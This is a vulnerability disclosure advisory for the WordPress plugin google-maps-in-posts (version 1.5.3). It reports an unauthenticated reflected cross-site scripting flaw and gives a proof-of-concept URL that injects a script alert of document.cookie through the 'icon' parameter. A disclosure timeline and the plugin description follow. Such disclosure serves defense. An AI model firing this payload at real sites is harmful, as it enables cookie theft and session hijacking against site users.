wp-plugin : google-maps-in-posts | Code Vigilant : to err is human.. To fix is Humanity

wp-plugin : google-maps-in-posts
Plugin Details

Plugin Name: wp-plugin : google-maps-in-posts

Effected Version : 1.5.3 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Identified by : anantshri

WPScan Reference URL

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon"><script>alert(document.cookie)</script>&

Vulnerable Parameter : icon

Type of XSS : Reflected

Disclosure Timeline

Vendor Contacted : 2014-01-05

Plugin Status : Updated on

Public Disclosure : July 7, 2014

CVE Number :

Plugin Description :

[|
    Google Maps in Posts plugin for WordPress gives possibility to use Google Maps Services in your blog.
    That could be useful for posts in WP, describing certain locations or events,
    to indicate them immediately in the WP post with a map. The Google Maps Plugin
    gives you a simple and easy Worpress administration back end to handle multiple
    locations and your own location would be defined only once for all the maps of your WP blog.	
]